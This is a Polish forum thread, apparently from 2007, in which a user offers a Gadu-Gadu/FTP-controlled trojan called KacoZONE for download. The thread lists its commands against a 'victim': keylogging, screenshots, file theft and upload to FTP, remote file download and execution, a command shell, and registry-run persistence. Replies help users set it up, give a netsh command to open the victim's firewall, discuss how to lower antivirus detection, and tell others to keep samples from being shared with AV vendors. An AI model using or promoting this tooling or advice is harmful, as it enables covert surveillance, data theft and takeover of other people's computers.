KacoZONE [trojan] Download

[T$cr!pt3r]

KacoZONE


Funkcje:

end kill :
Wylacza KacoZONE, do ponownego uruchomienia komputera ofiary

end uninstall :
Usuwa bezpowrotnie KacoZONE, z komputera ofiary

dir on :
Uruchamia tryb przegladania katalogow

dir off :
Wylacza przegladanie katalogow

keylogger on :
Uruchamia logowanie klawiszy

keylogger off :
Wylacza logowanie klawiszy keylogger log/txt :
Wysyla na FTP logi klawiszy

keylogger log :
Wysyla przez GG logi keyloggera

keylogger clear :
Czysci logi keyloggera

ftp connect :
Laczy z FTP

ftp disconnect :
Rozlacza z FTP

ftp screen :
Wysyla obraz z pulpitu na FTP

ftp download :
Pobiera na dysk ofiary plik z FTP,
Wzor:
ftp download|Nazwa_pliku_na_ftp|Sciezka_Zapisu
Przyklad:
ftp download|KacoZONE.exe|C:KacoZONE.exe

ftp upload :
Wysyla na FTP plik z dysku ofiary,
Wzor:
ftp upload|Sciezka_pliku|Nazwa_zapisu_na_ftp
Przyklad:
ftp upload|C:KacoZONE.exe|Kaconzek.exe

hide deskop :
Ukrywa wszystko z pulpitu

show deskop :
Pokazuje wszystko co ma byc na pulpicie

windows exit :
Wylacza komputer ofiary

windows reboot :
Resetuje komputer ofiary

cmd on :
Uruchamia powloke polecen

cmd off :
Wylacza powloke polecen

uruchom :
Uruchamia wskazany plik,
Wzor:
uruchom|Sciezka_pliku
Przyklad:
uruchom|C:KacoZONE.exe

delete :
Usuwa wskazany plik,
Wzor:
delete|Sciezka_pliku
Przyklad:
delete|C:KacoZONE.exe

info :
Pobiera informacje o ofierze

help :
Wysyla te wiadomosc

wyslij :
Wysyla na wskazany numer wiadomosc,
Wzor:
wyslij|NUMER|Tresc_wiadomosci
Przyklad:
wyslij|2664558|Siemka

schowek :
Zapisuje do schowka dany text,
Wzor:
schowek|Text
Przyklad:
schowek|hehe

messagebox :
Wyswietla komunikat,
Wzor:
messagebox|Tytul|Komunikat|Ikona|Przycisk
Ikony:
WARNING
INFORMATION
ERROR
QUESTION
HAND
Przyciski:
OK
YESNO
YESNOCANCEL
ABORTRETRYIGNORE
OKCANCEL
Przyklad:
messagebox|Windows Error|Czy wiesz ze jakis pedal siedzi w systemie Windows?|WARNING|YESNO

task list :
Pobiera liste aktywnych procesow

kill :
Zabija wskazany proces,
Wzor:
kill|Nazwa_procesu
Przyklad:
kill|KacoZONE.exe
reset :
Resetuje KacoZONE



## KONFIGURACJA: ##

konfiguracja :
Informuje o akualnej konfiguracji

ustaw ggsn :
Ustawia podany numer serwera
Wzor:
ustaw ggsn|NUMER
Przyklad: ustaw ggsn|00000

ustaw ggsh :
Ustawia haslo serwera
Wzor:
ustaw ggsh|HASLO
Przyklad:
ustaw ggsh|moje_haslo

ustaw ggcn :
Ustawia numer klienta
Wzor:
ustaw ggcn|NUMER
Przyklad:
ustaw ggcn|123456

ustaw ftph :
Ustawia host FTP
Wzor:
ustaw ftph|HOST
Przyklad:
ustaw ftph|kacozone.pl

ustaw ftpu :
Ustawia usera FTP
Wzor:
ustaw ftpu|NAZWA_USERA
Przyklad:
ustaw ftpu|[email protected]

ustaw ftpp :
Ustawia port FTP
Wzor:
ustaw ftpp|NUMER_PORTU
Przyklad:
ustaw ftpp|32

ustaw ftppas :
Ustawia pasywnosc FTP
Wzor:
ustaw ftppas|true/false
Przyklad:
ustaw ftpas|true

ustaw ftppass :
Ustawia haslo FTP
Wzor:
ustaw ftppass|HASLO
Przyklad:
ustaw ftppass|moje_haslo[/b]

Instalacja:
Program instaluje się do: C:Windowsgg.exe
Dodaje sie do rejestru: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

Wykrywalność:
4/32:
Logi TUTAJ

Zapraszam do downloadu wersji 1.1
Tutaj

 

[kris623]

Powiem szczeże dobry trojan

k:
Tylko litery są niewyraźne i co wpisać w porcie

 

[djmentos]

@UP
podstawowe info!
IP - Ardes ofiary
PORT - port przez który nastąpi połączenie. Możesz próbować na jakimś otwartym np 80
wtedy FW powinien go przepuścić. Ale nie wiem jak to się ma jeżeli port będzie zajęty.

 

[Dark Smark]

Nie potrzebnie dodałeś funkcje zabawy, przez to trojan staje się wykrywalny. Korzystałeś z gotowych komponentów dlatego wykrywalny jest. Brakuje opcji szukaj na dysku. Bardzo dobrze że dodałeś CMD

Wydaje się czysty.
Trochę ta czcionka nie taka

Zrzut:

 

[T$cr!pt3r]

Też mi się tak wydaje, że czcionka nie taka, ale nie chciało mi sie już zmieniać

Moim zdaniem AV lub/oraz FW nie powinien sapać jeżeli ofiara ma GG zainstalowane, jeżeli już by miały być problemy to przy łączeniu FTP, dlaczego? Bo na ogół ofiary nie mają tego portu otwartego, a jeżeli już mają to możemy sie czuć pewnie

kris623 w porcie wpisz raczej 21, bo jest to standardowy port FTP, choć nie koniecznie, wszystko zależy od twojego serwera FTP.

Przede wszystkim trzeba skonfigurować poprawnie ustawienia GG, a FTP to już można na zainstalowanym komputerze ofiary ustawić

Niedługo będzie kolejna wersja owego trojana, ale tym razem będę przede wszystkim zwracać uwagę na wykrywalność i pozbędę się:

schowek :
Zapisuje do schowka dany text,
Wzor:
schowek|Text
Przyklad:
schowek|hehe

hide deskop :
Ukrywa wszystko z pulpitu

show deskop :
Pokazuje wszystko co ma byc na pulpicie

windows exit :
Wylacza komputer ofiary

windows reboot :
Resetuje komputer ofiary

keylogger on :
Uruchamia logowanie klawiszy

keylogger off :
Wylacza logowanie klawiszy

keylogger log/txt :
Wysyla na FTP logi klawiszy

keylogger log :
Wysyla przez GG logi keyloggera

keylogger clear :
Czysci logi keyloggera

dir on :
Uruchamia tryb przegladania katalogow

dir off :
Wylacza przegladanie katalogow

Keyloggera dlatego, że po co komu on, jeżeli są od tego specjalne programy,
które można za pomocą

ftp download

ściągnąć na komputer ofiary.
Przeglądanie dysków dlatego, bo po co, jeżeli jest CMD
Wyłączanie/Resetowanie komputera też, bo po co komu to, jeżeli jest CMD.

 

[backdoorman]

jeśli jest cmd to można przepuścić ftp przez firewalla taką komendą :
"netsh firewall add allowedprogram %SystemRoot%System32ftp.exe ftp enable"
A jeszcze lepiej jak by była możliwość tworzenia i odpalania plików bat .

 

[b.]

Brakuje mi tu opcji screen : (.

 

[T$cr!pt3r]

Nie brakuje :] "ftp screen"

A przed tym wpisz: "ftp connect"

backdoorma można i tak, ale zauważ, że trojana używają ci co chcą się bez większych umiejętności do kogoś włamać i wątpię, że każdy z użytkowników trojanów był na
tyle zdolny co ty

 

[b.]

Przydala by sie obsluga mejla, bo z ftp nie moge sobie poradzic ; /.

///////////////////////

Blad: Brak pliku servera! ; /

 

[T$cr!pt3r]

Nie jest możliwe, że masz błąd:

Brak pliku servera![/b]

Bo:
• Plik serwera jest generowany przez konfigurator, ma go w zasobach, więc gdy uruchomisz konfigurator pojawi ci się plik: "KacoZONE.exe" i to właśnie jest serwer
• Nikomu innemu cos takiego się nie zdarzyło

FTP? Nic prostszego!
Do obsługi serwera polecam: "File Zilla" a do założenia konta FTP polecam yoyo.pl :]
Gdy już założysz sobie konto na yoyo.pl załóż nową stronę i wraz ze stroną dostaniesz konto FTP i dane gdzieś tam też są które możesz potem w konfiguracji ustawić, no i resztą wiadomo - FTP ustawienia możesz pominąć :]
Tzn. konfigurator cię nie przepuści bez wypełnienia wszystkich pól, ale możesz tam pierdoły napisać :]

Spróbuj pobrać jeszcze raz KacoZONE i ponownie skonfigurować, choć wątpię ze to co kol wiek zmieni, bo to to samo

 

[b.]

[ Dodano: 29-10-2007, 22:05 ]

Originally posted by T$cr!pt3r
Nie jest możliwe, że masz błąd:
<div class='quotetop'>CYTAT

Brak pliku servera!

Bo:
• Plik serwera jest generowany przez konfigurator, ma go w zasobach, więc gdy uruchomisz konfigurator pojawi ci się plik: "KacoZONE.exe" i to właśnie jest serwer
• Nikomu innemu cos takiego się nie zdarzyło

FTP? Nic prostszego!
Do obsługi serwera polecam: "File Zilla" a do założenia konta FTP polecam yoyo.pl :]
Gdy już założysz sobie konto na yoyo.pl załóż nową stronę i wraz ze stroną dostaniesz konto FTP i dane gdzieś tam też są które możesz potem w konfiguracji ustawić, no i resztą wiadomo - FTP ustawienia możesz pominąć :]

Tzn. konfigurator cię nie przepuści bez wypełnienia wszystkich pól, ale możesz tam pierdoły napisać :]

Spróbuj pobrać jeszcze raz KacoZONE i ponownie skonfigurować, choć wątpię ze to co kol wiek zmieni, bo to to samo

[/b][/quote]
Cholera, no niedziala ; (. Dalej wyskakuje ten blad, nawet noda wylaczylem, bo myslalem, ze cos blokuje...

 

[T$cr!pt3r]

Nie mam pojęcia, jak ty to robisz, że tobie to nie działa..

 

[b.]

Originally posted by T$cr!pt3r
Nie mam pojęcia, jak ty to robisz, że tobie to nie działa..

Dobra wiem co bylo przyczyna, sciagnolem jeszcze raz, ale z wylaczonym nodem ; ). Mam drugi problem..utworzylem 'niby' server i jak otwieram server u siebie wyskakuje mi komunikat o potwierdzeniu danych.. daje ok, ale nic sie nie dzieje. Otwieram znowu server i ten sam komunikat.

 

[T$cr!pt3r]

Bo gdy masz w tym samym katalogu co KacoZONE.exe plik KacoZONE_Konfigurator.exe to wtedy to wyskakuje

 

[0wn3r]

No nieźle T$cr!pt3r, tylko mam nadzieje, że nie okaże się, że sam tego nie pisałeś tak jak ostatnim razem

Takto nieźle Ci ten trojan wyszedł

Gratz

 

[b.]

U mnie nie dziala ten trojan ; /. Wlaczam exe i pupa..

 

[#036kAlAr]

Trojan ok!! Troche czcionka nieczytelna ale to jest pikuś

na początku sobie nie mogłem poradzić z odpaleniem ale już jest ok

Gratuluje ...


Pozdrawiam $kAlAr

 

[T$cr!pt3r]

Jeżeli co niektórzy mają problemy z odpaleniem tego, znaczy to, że trojan nie jest prosty w obsłudze :] To na przyszłość dla innych, mniej zdolnych informatyków.

Own3r - to co wtedy zrobiłem to normalnie mi wstyd za to, nie wiem po co to zrobiłem, ale nie poruszajmy już tego tematu ^^ a trojan ten nie jest żadnym gotowcem :]

Dziś postanowiłem, że napisze kolejne wersje KacoZONE, nie tylko na protokole GG,
również na socketach, ten na socketach zaś, będzie nieco bardziej rozbudowany :]
Dlaczego takie postanowienie? Ponieważ satysfakcjonuje mnie liczba downloadów.

31.10.07 18:00
Od tej chwili nie można pobrać KacoZONE, ponieważ ktoś z was "nakapował" administracji yoyo.pl, że mam materiały na stronie niezgodne z regulaminem. Jeżeli już ktoś z was jest tak cwany to niechaj sie przyzna?

 

[Attyla]

uaktualni download i jakie sa te 4 av ?

 

[Dark Smark]

Originally posted by T$cr!pt3r
Od tej chwili nie można pobrać KacoZONE, ponieważ ktoś z was "nakapował" administracji yoyo.pl, że mam materiały na stronie niezgodne z regulaminem. Jeżeli już ktoś z was jest tak cwany to niechaj sie przyzna?

Trochę nie rozumiem obsługi yoyo ponieważ posiadanie nie jest nie zgodne z prawem.

uaktualni download i jakie sa te 4 av ?[/b]

http://www.virustotal.com/pl/
Zaznacz "Nie dystrybuuj pliku."